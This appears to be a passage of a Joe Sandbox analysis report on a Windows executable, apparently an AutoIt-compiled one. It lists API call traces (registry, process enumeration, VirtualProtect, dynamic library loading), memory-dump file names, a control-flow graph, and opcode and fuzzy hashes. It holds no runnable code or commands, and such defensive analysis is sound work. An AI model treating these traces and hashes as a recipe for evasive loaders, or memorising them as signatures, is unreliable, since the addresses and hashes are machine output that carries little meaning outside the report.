                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00DD34F5
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00DD3502
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1240663315-0
                                                                                                                  • Opcode ID: 2d353eab2b70273b6382f1b99990e8610f5ca1744513f38480e2c03d88919d72
                                                                                                                  • Instruction ID: 0be758f21ff0e5e85f5145cff7ae90637a6b3f1f6780f1eddb883d26cc097ef2
                                                                                                                  • Opcode Fuzzy Hash: 2d353eab2b70273b6382f1b99990e8610f5ca1744513f38480e2c03d88919d72
                                                                                                                  • Instruction Fuzzy Hash: B3E14C71604201AFCB15DF28C995D2ABBE9EF88314F04896DF44ADB361DB31ED05CB62

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1278 d729c2-d729e2 1280 d729e4-d729e7 1278->1280 1281 d72a42-d72a44 1278->1281 1282 d729e9-d729f0 1280->1282 1283 d72a48 1280->1283 1281->1280 1284 d72a46 1281->1284 1285 d729f6-d729fb 1282->1285 1286 d72aac-d72ab4 PostQuitMessage 1282->1286 1288 de2307-de2335 call d7322e call d8ec33 1283->1288 1289 d72a4e-d72a51 1283->1289 1287 d72a2b-d72a33 NtdllDefWindowProc_W 1284->1287 1291 de238f-de23a3 call db57fb 1285->1291 1292 d72a01-d72a03 1285->1292 1293 d72a72-d72a74 1286->1293 1294 d72a39-d72a3f 1287->1294 1323 de233a-de2341 1288->1323 1295 d72a76-d72a9d SetTimer RegisterClipboardFormatW 1289->1295 1296 d72a53-d72a54 1289->1296 1291->1293 1317 de23a9 1291->1317 1298 d72ab6-d72ac0 call d71e58 1292->1298 1299 d72a09-d72a0e 1292->1299 1293->1294 1295->1293 1300 d72a9f-d72aaa CreatePopupMenu 1295->1300 1302 de22aa-de22ad 1296->1302 1303 d72a5a-d72a6d KillTimer call d72b94 call d72ac7 1296->1303 1318 d72ac5 1298->1318 1305 d72a14-d72a19 1299->1305 1306 de2374-de237b 1299->1306 1300->1293 1309 de22af-de22b1 1302->1309 1310 de22e3-de2302 MoveWindow 1302->1310 1303->1293 1315 de235f-de236f call db5fdb 1305->1315 1316 d72a1f-d72a25 1305->1316 1306->1287 1313 de2381-de238a call dab31f 1306->1313 1319 de22d2-de22de SetFocus 1309->1319 1320 de22b3-de22b6 1309->1320 1310->1293 1313->1287 1315->1293 1316->1287 1316->1323 1317->1287 1318->1293 1319->1293 1320->1316 1324 de22bc-de22cd call d7322e 1320->1324 1323->1287 1327 de2347-de235a call d72b94 call d73598 1323->1327 1324->1293 1327->1287
                                                                                                                  APIs
                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00D72A33
                                                                                                                  • KillTimer.USER32(?,00000001), ref: 00D72A5D
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D72A80
                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D72A8B
                                                                                                                  • CreatePopupMenu.USER32 ref: 00D72A9F
                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00D72AAE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                  • String ID: TaskbarCreated
                                                                                                                  • API String ID: 157504867-2362178303
                                                                                                                  • Opcode ID: f6c19ea920e19c2a2afaa242179797c26b0da98c281fab66c6e188491760eff3
                                                                                                                  • Instruction ID: 5d618b63b1db35c8629279a129001684b54afd2f6f11988079d2acce0e6bafdb
                                                                                                                  • Opcode Fuzzy Hash: f6c19ea920e19c2a2afaa242179797c26b0da98c281fab66c6e188491760eff3
                                                                                                                  • Instruction Fuzzy Hash: 864107311443C99FDB286F69EC0EB793A5AEB54300F08C159F64AE6291FA609C40DB75
                                                                                                                  APIs
                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00D8E4A7
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00E0DC28,?,?), ref: 00D8E567
                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,00E0DC28,?,?), ref: 00D8E5BC
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D8E5C7
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D8E5DA
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E0DC28,?,?), ref: 00D8E5E4
                                                                                                                  • GetSystemInfo.KERNEL32(?,00E0DC28,?,?), ref: 00D8E5F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2717633055-0
                                                                                                                  • Opcode ID: 29656f3888d2a820c1dce9897676f168204f83bd2c05e9eed56a124b07f5ba31
                                                                                                                  • Instruction ID: bf2b07675e6380e20762caa21b202733ce3431c8e02e1c541bf594865f732b8c
                                                                                                                  • Opcode Fuzzy Hash: 29656f3888d2a820c1dce9897676f168204f83bd2c05e9eed56a124b07f5ba31
                                                                                                                  • Instruction Fuzzy Hash: 9461B1B18093C4DBCF15EF6898C15E97FA5AF2A308F2985D9D8849B24BD624C908CF75
                                                                                                                  APIs
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D73202
                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00D73219
                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00DE57D7
                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00DE57EC
                                                                                                                  • LockResource.KERNEL32(?), ref: 00DE57FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                  • String ID: SCRIPT
                                                                                                                  • API String ID: 3051347437-3967369404
                                                                                                                  • Opcode ID: f5bea0a18a11e4848d4e7f5f7423ad41e651a381e6aa42f01befcbe670838021
                                                                                                                  • Instruction ID: e9a3e4bf5588d9415fc2b7adc9bc965e1482cd87580c29cbc7e43ecff892266b
                                                                                                                  • Opcode Fuzzy Hash: f5bea0a18a11e4848d4e7f5f7423ad41e651a381e6aa42f01befcbe670838021
                                                                                                                  • Instruction Fuzzy Hash: E0117970200701BFE7219B65EC48F277BBAEBC9B51F24C028B806D6290EB71DD00DAB0
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DB6F7D
                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DB6F8D
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00DB6FAC
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DB6FD0
                                                                                                                  • _wcscat.LIBCMT ref: 00DB6FE3
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DB7022
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1605983538-0
                                                                                                                  • Opcode ID: 7433e636c70b5ad02a14b97df509c58249992e00710fb43825d970297c8e7180
                                                                                                                  • Instruction ID: 881b0e39e72e66b762461ef4050879f6d2ad1d44f3881ac5d3f6545ebcb9a940
                                                                                                                  • Opcode Fuzzy Hash: 7433e636c70b5ad02a14b97df509c58249992e00710fb43825d970297c8e7180
                                                                                                                  • Instruction Fuzzy Hash: A7218071904219EBDB10ABA4CC88BEEB7BDAB49300F1404AAF546E3241E7759F84CB70
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00ED21EA
                                                                                                                  • GetProcAddress.KERNEL32(?,00ECBFF9), ref: 00ED2208
                                                                                                                  • ExitProcess.KERNEL32(?,00ECBFF9), ref: 00ED2219
                                                                                                                  • VirtualProtect.KERNEL32(00D70000,00001000,00000004,?,00000000), ref: 00ED2267
                                                                                                                  • VirtualProtect.KERNEL32(00D70000,00001000), ref: 00ED227C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1996367037-0
                                                                                                                  • Opcode ID: a6d7eac9ac3cdf49c2b0217780b9eb2cb8a506561b5be2840e7650bfd348ed06
                                                                                                                  • Instruction ID: 913f2656cae57090ae60d4fe406ba0bc3a36001372675c3e64ae2ffa4461b032
                                                                                                                  • Opcode Fuzzy Hash: a6d7eac9ac3cdf49c2b0217780b9eb2cb8a506561b5be2840e7650bfd348ed06
                                                                                                                  • Instruction Fuzzy Hash: 0E513972A453525BD7218EB8CCC02A5B7A0EB75328B28573ED7E1EB3C5E7905807C760
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 00DB78CB
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DBF04D
                                                                                                                  • CoCreateInstance.COMBASE(00DFDA7C,00000000,00000001,00DFD8EC,?), ref: 00DBF066
                                                                                                                  • CoUninitialize.COMBASE ref: 00DBF083
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 2126378814-24824748
                                                                                                                  • Opcode ID: 47ed66035f330e0f75571fac5ebaf844a071211b722e1922b632fe9934af857b
                                                                                                                  • Instruction ID: defdf050727b9dec2d47ec33ec1945aa8ba7a3921b7aedb5d3e9d470c22de09a
                                                                                                                  • Opcode Fuzzy Hash: 47ed66035f330e0f75571fac5ebaf844a071211b722e1922b632fe9934af857b
                                                                                                                  • Instruction Fuzzy Hash: A3A11475604301AFC710DF14C884D6ABBE6FF88324F148998F99A9B3A1DB31ED45CBA1
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesW.KERNEL32(00D7C848,00D7C848), ref: 00D8DDA2
                                                                                                                  • FindFirstFileW.KERNEL32(00D7C848,?), ref: 00DE4A83
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$AttributesFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4185537391-0
                                                                                                                  • Opcode ID: a5f7367f850e68e399309760bc49313fb0153e017f30d9350d5032c83d79484a
                                                                                                                  • Instruction ID: ca6dbc3b7bc74811fe176ffaac95a0dba5c359d132b0fc311a4fcfe3c8bcd04e
                                                                                                                  • Opcode Fuzzy Hash: a5f7367f850e68e399309760bc49313fb0153e017f30d9350d5032c83d79484a
                                                                                                                  • Instruction Fuzzy Hash: EAE0DF32414741AB82147738EC0D8FA379E9B0633CB244715F876C22E0EB70AD50C6FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 598e02307bf6d6bc630f5dac5debf375e1658a87d3634b582f6912417fcfc1f7
                                                                                                                  • Instruction ID: ed51f4f1509230a4809c0663b512672ffc3272d472892fac9d1ec4635d078639
                                                                                                                  • Opcode Fuzzy Hash: 598e02307bf6d6bc630f5dac5debf375e1658a87d3634b582f6912417fcfc1f7
                                                                                                                  • Instruction Fuzzy Hash: 24228D70900245DFDB24DF58C491AAAF7F1FF19300F18C169E89AAB391E771A985CBB1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3964851224-0
                                                                                                                  • Opcode ID: d654381023798d00e145af9658bbcc0b11b29b33f34d7b4c200df2e5b4b3c8b3
                                                                                                                  • Instruction ID: ec3cfefb7a9d80a63f3f7c23616cff54f61fce7f9349a805e627b32da3caaadb
                                                                                                                  • Opcode Fuzzy Hash: d654381023798d00e145af9658bbcc0b11b29b33f34d7b4c200df2e5b4b3c8b3
                                                                                                                  • Instruction Fuzzy Hash: 94925A70608341DFD724EF18C484B6ABBE1FF88704F18895DE98A8B292D775ED45CB62
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NameUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2645101109-0
                                                                                                                  • Opcode ID: 077615ddf973624e916f65be333a6ae2ee7ce8c47d91a78333ce6631dff910e9
                                                                                                                  • Instruction ID: d3f5355477bb463588ed7df7e1d8c0f7ec62f42d017231c6bce1ecfb436f2331
                                                                                                                  • Opcode Fuzzy Hash: 077615ddf973624e916f65be333a6ae2ee7ce8c47d91a78333ce6631dff910e9
                                                                                                                  • Instruction Fuzzy Hash: A2C04CB140410DEFCB15DB80D9859EFB7BDBB04304F204096A155E1100D7709B459F71
                                                                                                                  APIs
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E279
                                                                                                                  • timeGetTime.WINMM ref: 00D7E51A
                                                                                                                  • TranslateMessage.USER32(?), ref: 00D7E646
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00D7E651
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E664
                                                                                                                  • LockWindowUpdate.USER32(00000000), ref: 00D7E697
                                                                                                                  • DestroyWindow.USER32 ref: 00D7E6A3
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7E6BD
                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00DE5B15
                                                                                                                  • TranslateMessage.USER32(?), ref: 00DE62AF
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00DE62BD
                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DE62D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                  • API String ID: 2641332412-570651680
                                                                                                                  • Opcode ID: 35758fffd59de49753a5392e4048f3b9c70b8937e2b138c458f3ed519f1cefff
                                                                                                                  • Instruction ID: 2fcfd58889860895af37e96b5e2e26392028228c7d61f90879d5ec36afc0a389
                                                                                                                  • Opcode Fuzzy Hash: 35758fffd59de49753a5392e4048f3b9c70b8937e2b138c458f3ed519f1cefff
                                                                                                                  • Instruction Fuzzy Hash: 5F62B470504384DFD724EF25D885BAA77E5FF44308F1889ADE98A9B292E770D844CB72
                                                                                                                  APIs
                                                                                                                  • ___createFile.LIBCMT ref: 00DA6C73
                                                                                                                  • ___createFile.LIBCMT ref: 00DA6CB4
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DA6CDD
                                                                                                                  • __dosmaperr.LIBCMT ref: 00DA6CE4
                                                                                                                  • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DA6CF7
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00DA6D1A
                                                                                                                  • __dosmaperr.LIBCMT ref: 00DA6D23
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00DA6D2C
                                                                                                                  • __set_osfhnd.LIBCMT ref: 00DA6D5C
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6DC6
                                                                                                                  • __close_nolock.LIBCMT ref: 00DA6DEC
                                                                                                                  • __chsize_nolock.LIBCMT ref: 00DA6E1C
                                                                                                                  • __lseeki64_nolock.LIBCMT ref: 00DA6E2E
